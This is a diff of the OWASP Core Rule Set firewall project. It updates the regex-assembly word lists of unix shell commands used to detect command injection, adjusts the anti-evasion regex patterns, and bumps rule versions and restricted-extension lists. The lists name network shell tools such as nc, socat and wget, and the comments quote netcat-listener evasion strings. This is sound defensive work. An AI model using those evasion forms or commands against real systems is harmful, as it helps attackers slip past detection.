 openssl
 openvpn
 openvt
-opkg
+opkg@
 pacman@
 parted@
 passwd
 paste@
 patch@
+pdb2mb
+pdb3@
+pdb3\.
 pdflatex
 pdftex
-pdksh
+pdksh@
 perf@
+perl5@
 perl@
-perl5
 perlsh
 perms@
-pftp
-pgrep
+pftp@
+pgrep@
 php-cgi
-php5
-php7
+php5@
+php7@
 pico@
 pidstat
-pigz
+pigz@
 ping@
 pkexec
 pkg_info
 pkginfo
-pkill
-popd
+pkill@
+popd@
 printenv
 printf@
-psed
+psed@
 psftp
-psql
-ptar
+psql@
+ptar@
 ptardiff
 ptargrep
 puppet@
-pushd
+pushd@
 pwd\.db
+py3versions
 python2
 python3
 python~
 pyversions
-py3versions
 rake@
-raku
-rbash
+raku@
+rbash@
 readelf
+reboot@
 realpath
 redcarpet@
 rename@
@@ -421,40 +449,40 @@ rlogin
 rlwrap
 rmdir@
 rmuser
-rnano
+rnano@
 route@
-rpmdb
+rpmdb@
 rpmquery
 rpmverify
-rsync
+rsync-ssl
+rsync@
 ruby~
 run-mailcap
 run-parts
-rview
-rvim
+rview@
+rvim@
 sash@
 sched@
 screen@
 script@
-sdiff
-self@
-sendmail
+sdiff@
+sendmail@
 service@
 setarch
 setenv
 setfacl@
 setsid
-sftp
+sftp@
 sh\.distrib
 shadow@
 shells@
-shuf
+shuf@
 shutdown@
 sleep@
-slsh
+slsh@
 smbclient
 snap@
-socat
+socat@
 soelim
 sort@
 source@
@@ -467,47 +495,61 @@ sshpass
 start-stop-daemon
 stdbuf
 stderr
-stdin
+stdin@
 stdout
 strace
 strings@
-sudo
+sudo@
+sudo_
+sudoedit
+sudoreplay
+svnadmin
+svnauthz
+svnbench
+svndumpfilter
+svnfsfs
+svnlook
+svnmucc
+svnrdump
+svnserve
+svnsync
+svnversion
 sysctl
 systemctl
 systemd-resolve
 tail@
-tailf
+tailf@
 task@
 taskset
-tclsh
+tclsh@
 tcpdump
 tcping
 tcptraceroute
-tcsh
+tcsh@
 telnet
-tftp
+tftp@
 time@
 timedatectl
 timeout@
-tmux
+tmux@
 touch@
 traceroute
 traceroute6
-troff
+troff@
 tshark
 ulimit@
-uname
+uname@
 uncompress@
 unexpand
-uniq
+uniq@
 unlink@
-unlz4
+unlz4@
 unlzma
 unpigz
-unrar
+unrar@
 unset@
 unshare@
-unxz
+unxz@
 unzip@
 unzstd
 up2date@
@@ -519,30 +561,30 @@ uudecode
 uuencode
 valgrind
 view@
-vigr
+vigr@
 vimdiff
-vipw
-virsh
+vipw@
+virsh@
 visudo
 volatility@
 wall@
 watch@
-wget
+wget@
 whiptail@
 whoami
-whois
+whois@
 wireshark
 wish@
-xargs
+xargs@
 xelatex
-xetex
+xetex@
 xmodmap
-xmore
-xpad
-xterm
-xzcat
-xzcmp
-xzdec
+xmore@
+xpad@
+xterm@
+xzcat@
+xzcmp@
+xzdec@
 xzdiff
 xzegrep
 xzfgrep
@@ -552,13 +594,13 @@ xzmore
 yarn@
 yelp@
 zathura
-zcat
-zcmp
-zdiff
+zcat@
+zcmp@
+zdiff@
 zegrep
 zero@
 zfgrep
-zgrep
+zgrep@
 zipcloak
 zipcmp
 zipdetails
@@ -568,11 +610,11 @@ zipmerge
 zipnote
 zipsplit
 ziptool
-zless
-zmore
-zrun
+zless@
+zmore@
+zrun@
 zsoelim
-zstd
+zstd@
 zstdcat
 zstdgrep
 zstdless
diff --git a/regex-assembly/include/unix-shell-evasion-prefix.ra b/regex-assembly/include/unix-shell-evasion-prefix.ra
index c9d5baa62..51d3cf691 100644
--- a/regex-assembly/include/unix-shell-evasion-prefix.ra
+++ b/regex-assembly/include/unix-shell-evasion-prefix.ra
@@ -9,15 +9,15 @@
 ##! <some command> ifconfig
 ##!> cmdline unix
   busybox
-  command
-  env
-  eval
+  command@
+  env@
+  eval@
   ltrace
   nohup
   strace
-  time
+  time@
   timeout
-  watch
+  watch@
 ##!<
 ##! ;ifconfig
 ;
diff --git a/regex-assembly/include/unix-shell-pl3.ra b/regex-assembly/include/unix-shell-pl3.ra
index c17b75154..d023e735d 100644
--- a/regex-assembly/include/unix-shell-pl3.ra
+++ b/regex-assembly/include/unix-shell-pl3.ra
@@ -20,7 +20,7 @@
 aptitude@
 dnf
 pacman@
-ps
+ps@
 up2date@
 vi@
 who
diff --git a/regex-assembly/include/unix-shell-upto3.ra b/regex-assembly/include/unix-shell-upto3.ra
index 874e5983f..17410085e 100644
--- a/regex-assembly/include/unix-shell-upto3.ra
+++ b/regex-assembly/include/unix-shell-upto3.ra
@@ -40,23 +40,18 @@
 ##!   fi
 ##! done <<<"${source}"
 
-##! # check entries for English words and suffix those
-##! original="$(grep -vE '^[#$]' regex-assembly/include/unix-shell-upto3.ra)"
-##! english="$(util/fp-finder/spell.sh -m -e regex-assembly/include/unix-shell-upto3.ra)"
-##! # do not suffix the following words:
-##! english="$(grep -vE 'ip|id|top|set' <<< "${english}")"
+##! # Add `@` suffix to all words, except those suffixed with `~`
+##! original="${result}"
 ##! result=""
 ##! while read -r oword; do
-##!   found=0
-##!   while read -r eword; do
-##!     if [ "${oword}" = "${eword}" ] && [ -n "${oword}" ]; then
-##!       result="${result}${oword}@${NL}"
-##!       found=1
-##!       break
+##!   oword_raw="${oword/%@/}"
+##!   if [ -n "${oword}" ]; then
+##!     oword_raw="${oword/%@/}"
+##!     if [[ "${oword_raw}" == "${oword_raw/%\~/}" ]]; then
+##!       result="${result}${oword_raw}@${NL}"
+##!     else
+##!       result="${result}${oword_raw}${NL}"
 ##!     fi
-##!   done <<<"${english}"
-##!   if [ ${found} -eq 0 ]; then
-##!     result="${result}${oword}${NL}"
 ##!   fi
 ##! done <<<"${original}"
 
@@ -68,15 +63,14 @@
 ##! EOF
 ##! echo "${result}" | sort | uniq >> regex-assembly/include/unix-shell-upto3.ra
 
-7z
-7za
-7zr
-7zx
-GET@
+7z@
+7za@
+7zr@
+7zx@
 ab@
 apt@
 ar@
-arj
+arj@
 arp@
 as@
 ash@
@@ -84,59 +78,60 @@ at@
 awk@
 aws@
 bzz@
-c89
-c99
+c89@
+c99@
 cat@
 cc@
-cmp
+cmp@
 cp@
-csh
+csh@
 cut@
 dd@
-df
+df@
 dig@
 dir@
-dnf
+dnf@
 du@
 eb@
 ed@
 env@
-eqn
+eqn@
 es@
-esh
+esh@
 ex@
 fc@
-fd
-fg
+fd@
+fg@
 fi@
-fmt
+fmt@
 ftp@
 gcc~
-gdb
+gdb@
 gem@
-ghc
+GET@
+ghc@
 git@
 go@
-gpg
-grc
+gpg@
+grc@
 hd@
 hup@
-id
-ip
-irb
-jjs
-jq
-ksh
+id@
+ip@
+irb@
+jjs@
+jq@
+ksh@
 ld@
 ldd@
 ln@
 lp@
-ls
+ls@
 lua@
-lz4
 lz@
+lz4@
 man@
-mtr
+mtr@
 mv@
 nc@
 net@
@@ -145,27 +140,27 @@ nm@
 npm@
 od@
 pax@
-pdb
+pdb@
 pf@
-pg
+pg@
 php@
 pic@
 pip~
-pkg
+pkg@
 pr@
 pry@
 ps@
-ptx
-pwd
-pxz
+ptx@
+pwd@
+pxz@
 rar@
-rc
+rc@
 rcp@
 red@
 rev@
 rm@
 rpm@
-scp
+scp@
 sed@
 set@
 sg@
@@ -173,26 +168,26 @@ sh@
 ss@
 ssh@
 su@
-svn
-tac
+svn@
+tac@
 tar@
-tbl
+tbl@
 tcp@
 tee@
 tex@
 tic@
-top
-udp
+top@
+udp@
 ul@
 vi@
 vim@
-w3m
 w@
-wc
+w3m@
+wc@
 who@
-xxd
+xxd@
 xz@
 yes@
-yum
+yum@
 zip@
-zsh
+zsh@
diff --git a/regex-assembly/toolchain.yaml b/regex-assembly/toolchain.yaml
index d921b799b..42e9acf48 100644
--- a/regex-assembly/toolchain.yaml
+++ b/regex-assembly/toolchain.yaml
@@ -13,11 +13,13 @@ patterns:
     windows: |
       [\"\^]*
   anti_evasion_suffix:
+    # - \s$: end of line / string
     # - <>: redirection, e.g., `cat<foo`
     # - ,: brace expansion, e.g., `""{nc,-p,777}`
-    ## - &|: logical operators in headers, e.g., `a=nc&&$a -nlvp 555`
+    # - &|: logical operators in headers, e.g., `a=nc&&$a -nlvp 555`
+    # - ): subshell, e.g, `(ifconfig)`
     unix: |
-      [\s<>,&|)].*
+      (?:[\s<>&|),]|$).*
     # "more foo", "more,foo", "more;foo", "more.com", "more/e",
     # "more<foo", "more>foo"
     windows: |
@@ -25,6 +27,9 @@ patterns:
   # Same as above but does not allow any white space as the next token.
   # This is useful for words like `python3`, where `python@` would
   # create too many false positives because it would match `python `.
+  # These patterns consist mainly of combinations of the `anti_evasion`
+  # and `anti_evasion_suffix` patterns above, with only a few bits of
+  # additional matching logic.
   anti_evasion_no_space_suffix:
     # This will match:
     #
@@ -34,7 +39,7 @@ patterns:
     # It will _not_ match:
     # python foo
     unix: |
-      (?:[<>,&|]|(?:[\w\d._-][\x5c'\"\[]*(?:(?:(?:\|\||&&)\s*)?\$[a-z0-9_@?!#{*-]*)?\x5c?)+[\s<>,&|]).*
+      (?:(?:[<>&|),]|$){1,10}|(?:[\w\d._-][\x5c'\"\[)]*(?:(?:(?:\|\||&&)\s*)?\$[a-z0-9_@?!#{(*-]*)?\x5c?){1,10}(?:[\s<>&|),]|$){1,10})
     # This will match:
     #
     # python,foo
@@ -43,4 +48,4 @@ patterns:
     # It will _not_ match:
     # python foo
     windows: |
-      (?:[,;./<>]|(?:[\w\d._-][\"\^]*)+[\s,;./<>]).*
+      (?:[,;./<>]{1,10}|(?:[\w\d._-][\"\^]*){1,10}[\s,;./<>]{1,10})
diff --git a/renovate.json b/renovate.json
index 26f58fa20..6037cbf68 100644
--- a/renovate.json
+++ b/renovate.json
@@ -4,7 +4,20 @@
     "local>coreruleset/renovate-config",
     "schedule:weekly"
   ],
+  "ignorePaths": [],
   "enabledManagers": [
     "docker-compose"
+  ],
+  "packageRules": [
+    {
+      "matchUpdateTypes": [
+        "major",
+        "minor",
+        "patch",
+        "pin",
+        "digest"
+      ],
+      "addLabels": ["release:ignore"]
+    }
   ]
 }
diff --git a/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example b/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example
index b58c889e9..e83dba755 100644
--- a/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example
+++ b/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP CRS ver.4.6.0
+# OWASP CRS ver.4.15.0-dev
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-# Copyright (c) 2021-2024 CRS project. All rights reserved.
+# Copyright (c) 2021-2025 CRS project. All rights reserved.
 #
 # The OWASP CRS is distributed under
 # Apache Software License (ASL) version 2
diff --git a/rules/REQUEST-901-INITIALIZATION.conf b/rules/REQUEST-901-INITIALIZATION.conf
index 1571c4807..da0cad9ed 100644
--- a/rules/REQUEST-901-INITIALIZATION.conf
+++ b/rules/REQUEST-901-INITIALIZATION.conf
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP CRS ver.4.6.0
+# OWASP CRS ver.4.15.0-dev
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-# Copyright (c) 2021-2024 CRS project. All rights reserved.
+# Copyright (c) 2021-2025 CRS project. All rights reserved.
 #
 # The OWASP CRS is distributed under
 # Apache Software License (ASL) version 2
@@ -26,7 +26,7 @@
 #
 # Ref: https://github.com/owasp-modsecurity/ModSecurity/wiki/Reference-Manual-(v2.x)#seccomponentsignature
 #
-SecComponentSignature "OWASP_CRS/4.6.0"
+SecComponentSignature "OWASP_CRS/4.15.0-dev"
 
 #
 # -=[ Default setup values ]=-
@@ -58,9 +58,9 @@ SecRule &TX:crs_setup_version "@eq 0" \
     status:500,\
     log,\
     auditlog,\
-    msg:'ModSecurity CRS is deployed without configuration! Please copy the crs-setup.conf.example template to crs-setup.conf, and include the crs-setup.conf file in your webserver configuration before including the CRS rules. See the INSTALL file in the CRS directory for detailed instructions',\
+    msg:'CRS is deployed without configuration! Please copy the crs-setup.conf.example template to crs-setup.conf, and include the crs-setup.conf file in your webserver configuration before including the CRS rules. See the INSTALL file in the CRS directory for detailed instructions',\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL'"
 
 
@@ -79,7 +79,7 @@ SecRule &TX:inbound_anomaly_score_threshold "@eq 0" \
     pass,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.inbound_anomaly_score_threshold=5'"
 
 # Default Outbound Anomaly Threshold Level (rule 900110 in crs-setup.conf)
@@ -89,7 +89,7 @@ SecRule &TX:outbound_anomaly_score_threshold "@eq 0" \
     pass,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.outbound_anomaly_score_threshold=4'"
 
 # Default Reporting Level (rule 900115 in crs-setup.conf)
@@ -99,7 +99,7 @@ SecRule &TX:reporting_level "@eq 0" \
     pass,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.reporting_level=4'"
 
 # Default Early Blocking (rule 900120 in crs-setup.conf)
@@ -109,7 +109,7 @@ SecRule &TX:early_blocking "@eq 0" \
     pass,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.early_blocking=0'"
 
 # Default Blocking Paranoia Level (rule 900000 in crs-setup.conf)
@@ -119,7 +119,7 @@ SecRule &TX:blocking_paranoia_level "@eq 0" \
     pass,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.blocking_paranoia_level=1'"
 
 # Default Detection Paranoia Level (rule 900001 in crs-setup.conf)
@@ -129,7 +129,7 @@ SecRule &TX:detection_paranoia_level "@eq 0" \
     pass,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.detection_paranoia_level=%{TX.blocking_paranoia_level}'"
 
 # Default Sampling Percentage (rule 900400 in crs-setup.conf)
@@ -139,7 +139,7 @@ SecRule &TX:sampling_percentage "@eq 0" \
     pass,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.sampling_percentage=100'"
 
 # Default Anomaly Scores (rule 900100 in crs-setup.conf)
@@ -149,7 +149,7 @@ SecRule &TX:critical_anomaly_score "@eq 0" \
     pass,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.critical_anomaly_score=5'"
 
 SecRule &TX:error_anomaly_score "@eq 0" \
@@ -158,7 +158,7 @@ SecRule &TX:error_anomaly_score "@eq 0" \
     pass,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.error_anomaly_score=4'"
 
 SecRule &TX:warning_anomaly_score "@eq 0" \
@@ -167,7 +167,7 @@ SecRule &TX:warning_anomaly_score "@eq 0" \
     pass,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.warning_anomaly_score=3'"
 
 SecRule &TX:notice_anomaly_score "@eq 0" \
@@ -176,7 +176,7 @@ SecRule &TX:notice_anomaly_score "@eq 0" \
     pass,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.notice_anomaly_score=2'"
 
 # Default HTTP policy: allowed_methods (rule 900200 in crs-setup.conf)
@@ -186,7 +186,7 @@ SecRule &TX:allowed_methods "@eq 0" \
     pass,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'"
 
 # Default HTTP policy: allowed_request_content_type (rule 900220 in crs-setup.conf)
@@ -196,8 +196,8 @@ SecRule &TX:allowed_request_content_type "@eq 0" \
     pass,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
-    setvar:'tx.allowed_request_content_type=|application/x-www-form-urlencoded| |multipart/form-data| |multipart/related| |text/xml| |application/xml| |application/soap+xml| |application/json| |application/cloudevents+json| |application/cloudevents-batch+json|'"
+    ver:'OWASP_CRS/4.15.0-dev',\
+    setvar:'tx.allowed_request_content_type=|application/x-www-form-urlencoded| |multipart/form-data| |text/xml| |application/xml| |application/soap+xml| |application/json|'"
 
 # Default HTTP policy: allowed_request_content_type_charset (rule 900280 in crs-setup.conf)
 SecRule &TX:allowed_request_content_type_charset "@eq 0" \
@@ -206,7 +206,7 @@ SecRule &TX:allowed_request_content_type_charset "@eq 0" \
     pass,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.allowed_request_content_type_charset=|utf-8| |iso-8859-1| |iso-8859-15| |windows-1252|'"
 
 # Default HTTP policy: allowed_http_versions (rule 900230 in crs-setup.conf)
@@ -216,7 +216,7 @@ SecRule &TX:allowed_http_versions "@eq 0" \
     pass,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.allowed_http_versions=HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0 HTTP/3 HTTP/3.0'"
 
 # Default HTTP policy: restricted_extensions (rule 900240 in crs-setup.conf)
@@ -226,8 +226,8 @@ SecRule &TX:restricted_extensions "@eq 0" \
     pass,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
-    setvar:'tx.restricted_extensions=.asa/ .asax/ .ascx/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pem/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/'"
+    ver:'OWASP_CRS/4.15.0-dev',\
+    setvar:'tx.restricted_extensions=.ani/ .asa/ .asax/ .ascx/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .compositefont/ .config/ .conf/ .crt/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dist/ .dll/ .dos/ .dpkg-dist/ .drv/ .gadget/ .hta/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .inf/ .ini/ .jse/ .key/ .licx/ .lnk/ .log/ .mdb/ .msc/ .ocx/ .old/ .pass/ .pdb/ .pfx/ .pif/ .pem/ .pol/ .prf/ .printer/ .pwd/ .rdb/ .rdp/ .reg/ .resources/ .resx/ .scr/ .sct/ .shs/ .sql/ .swp/ .sys/ .tlb/ .tmp/ .url/ .vb/ .vbe/ .vbs/ .vbproj/ .vsdisco/ .vxd/ .webinfo/ .ws/ .wsc/ .wsf/ .wsh/ .xsd/ .xsx/'"
 
 # Default HTTP policy: restricted_headers_basic (rule 900250 in crs-setup.conf)
 SecRule &TX:restricted_headers_basic "@eq 0" \
@@ -236,8 +236,8 @@ SecRule &TX:restricted_headers_basic "@eq 0" \
     pass,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
-    setvar:'tx.restricted_headers_basic=/content-encoding/ /proxy/ /lock-token/ /content-range/ /if/ /x-http-method-override/ /x-http-method/ /x-method-override/'"
+    ver:'OWASP_CRS/4.15.0-dev',\
+    setvar:'tx.restricted_headers_basic=/content-encoding/ /proxy/ /lock-token/ /content-range/ /if/ /x-http-method-override/ /x-http-method/ /x-method-override/ /x-middleware-subrequest/'"
 
 # Default HTTP policy: restricted_headers_extended (rule 900255 in crs-setup.conf)
 SecRule &TX:restricted_headers_extended "@eq 0" \
@@ -246,7 +246,7 @@ SecRule &TX:restricted_headers_extended "@eq 0" \
     pass,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.restricted_headers_extended=/accept-charset/'"
 
 # Default enforcing of body processor URLENCODED (rule 900010 in crs-setup.conf)
@@ -256,7 +256,7 @@ SecRule &TX:enforce_bodyproc_urlencoded "@eq 0" \
     pass,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.enforce_bodyproc_urlencoded=0'"
 
 # Default check for UTF8 encoding validation (rule 900950 in crs-setup.conf)
@@ -266,9 +266,19 @@ SecRule &TX:crs_validate_utf8_encoding "@eq 0" \
     pass,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.crs_validate_utf8_encoding=0'"
 
+# Default check for skipping response analysis (rule 900500 in crs-setup.conf)
+SecRule &TX:crs_skip_response_analysis "@eq 0" \
+    "id:901170,\
+    phase:1,\
+    pass,\
+    nolog,\
+    tag:'OWASP_CRS',\
+    ver:'OWASP_CRS/4.15.0-dev',\
+    setvar:'tx.crs_skip_response_analysis=0'"
+
 #
 # -=[ Initialize internal variables ]=-
 #
@@ -284,7 +294,7 @@ SecAction \
     t:none,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.blocking_inbound_anomaly_score=0',\
     setvar:'tx.detection_inbound_anomaly_score=0',\
     setvar:'tx.inbound_anomaly_score_pl1=0',\
@@ -320,19 +330,21 @@ SecAction \
 # The creation of the IP and the GLOBAL collection is not being tested as
 # of this writing due to limits in ftw and our testing setup.
 # Proper testing would involve the checking of a variable in the said collections.
-SecRule TX:ENABLE_DEFAULT_COLLECTIONS "@eq 1" \
+SecRule &TX:ENABLE_DEFAULT_COLLECTIONS "@eq 1" \
     "id:901320,\
     phase:1,\
     pass,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.ua_hash=%{REQUEST_HEADERS.User-Agent}',\
     chain"
-    SecRule TX:ua_hash "@unconditionalMatch" \
-        "t:none,t:sha1,t:hexEncode,\
-        initcol:global=global,\
-        initcol:ip=%{remote_addr}_%{MATCHED_VAR}"
+    SecRule TX:ENABLE_DEFAULT_COLLECTIONS "@eq 1" \
+        "chain"
+        SecRule TX:ua_hash "@unconditionalMatch" \
+            "t:none,t:sha1,t:hexEncode,\
+            initcol:global=global,\
+            initcol:ip=%{remote_addr}_%{MATCHED_VAR}"
 
 #
 # -=[ Initialize Correct Body Processing ]=-
@@ -350,7 +362,7 @@ SecRule REQBODY_PROCESSOR "!@rx (?:URLENCODED|MULTIPART|XML|JSON)" \
     msg:'Enabling body inspection',\
     tag:'OWASP_CRS',\
     ctl:forceRequestBodyVariable=On,\
-    ver:'OWASP_CRS/4.6.0'"
+    ver:'OWASP_CRS/4.15.0-dev'"
 
 # Force body processor URLENCODED
 SecRule TX:enforce_bodyproc_urlencoded "@eq 1" \
@@ -362,7 +374,7 @@ SecRule TX:enforce_bodyproc_urlencoded "@eq 1" \
     noauditlog,\
     msg:'Enabling forced body inspection for ASCII content',\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     chain"
     SecRule REQBODY_PROCESSOR "!@rx (?:URLENCODED|MULTIPART|XML|JSON)" \
         "ctl:requestBodyProcessor=URLENCODED"
@@ -402,7 +414,7 @@ SecRule TX:sampling_percentage "@eq 100" \
     pass,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     skipAfter:END-SAMPLING"
 
 SecRule UNIQUE_ID "@rx ^[a-f]*([0-9])[a-f]*([0-9])" \
@@ -413,7 +425,7 @@ SecRule UNIQUE_ID "@rx ^[a-f]*([0-9])[a-f]*([0-9])" \
     t:sha1,t:hexEncode,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'TX.sampling_rnd100=%{TX.1}%{TX.2}'"
 
 #
@@ -438,7 +450,7 @@ SecRule TX:sampling_rnd100 "!@lt %{tx.sampling_percentage}" \
     msg:'Sampling: Disable the rule engine based on sampling_percentage %{TX.sampling_percentage} and random number %{TX.sampling_rnd100}',\
     tag:'OWASP_CRS',\
     ctl:ruleRemoveByTag=OWASP_CRS,\
-    ver:'OWASP_CRS/4.6.0'"
+    ver:'OWASP_CRS/4.15.0-dev'"
 
 SecMarker "END-SAMPLING"
 
@@ -457,4 +469,4 @@ SecRule TX:detection_paranoia_level "@lt %{tx.blocking_paranoia_level}" \
     log,\
     msg:'Detection paranoia level configured is lower than the paranoia level itself. This is illegal. Blocking request. Aborting',\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0'"
+    ver:'OWASP_CRS/4.15.0-dev'"
diff --git a/rules/REQUEST-905-COMMON-EXCEPTIONS.conf b/rules/REQUEST-905-COMMON-EXCEPTIONS.conf
index 7e12926f6..5eab7c219 100644
--- a/rules/REQUEST-905-COMMON-EXCEPTIONS.conf
+++ b/rules/REQUEST-905-COMMON-EXCEPTIONS.conf
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP CRS ver.4.6.0
+# OWASP CRS ver.4.15.0-dev
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-# Copyright (c) 2021-2024 CRS project. All rights reserved.
+# Copyright (c) 2021-2025 CRS project. All rights reserved.
 #
 # The OWASP CRS is distributed under
 # Apache Software License (ASL) version 2
@@ -25,7 +25,7 @@ SecRule REQUEST_LINE "@streq GET /" \
     tag:'platform-apache',\
     tag:'attack-generic',\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     chain"
     SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,::1" \
         "t:none,\
@@ -46,7 +46,7 @@ SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,::1" \
     tag:'platform-apache',\
     tag:'attack-generic',\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     chain"
     SecRule REQUEST_HEADERS:User-Agent "@endsWith (internal dummy connection)" \
         "t:none,\
diff --git a/rules/REQUEST-911-METHOD-ENFORCEMENT.conf b/rules/REQUEST-911-METHOD-ENFORCEMENT.conf
index be9f0f7bb..caffbcf59 100644
--- a/rules/REQUEST-911-METHOD-ENFORCEMENT.conf
+++ b/rules/REQUEST-911-METHOD-ENFORCEMENT.conf
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP CRS ver.4.6.0
+# OWASP CRS ver.4.15.0-dev
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-# Copyright (c) 2021-2024 CRS project. All rights reserved.
+# Copyright (c) 2021-2025 CRS project. All rights reserved.
 #
 # The OWASP CRS is distributed under
 # Apache Software License (ASL) version 2
@@ -14,8 +14,8 @@
 
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:911011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:911012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:911011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:911012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
 #
 # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher)
 #
@@ -37,33 +37,34 @@ SecRule REQUEST_METHOD "!@within %{tx.allowed_methods}" \
     tag:'attack-generic',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/METHOD-ENFORCEMENT',\
     tag:'capec/1000/210/272/220/274',\
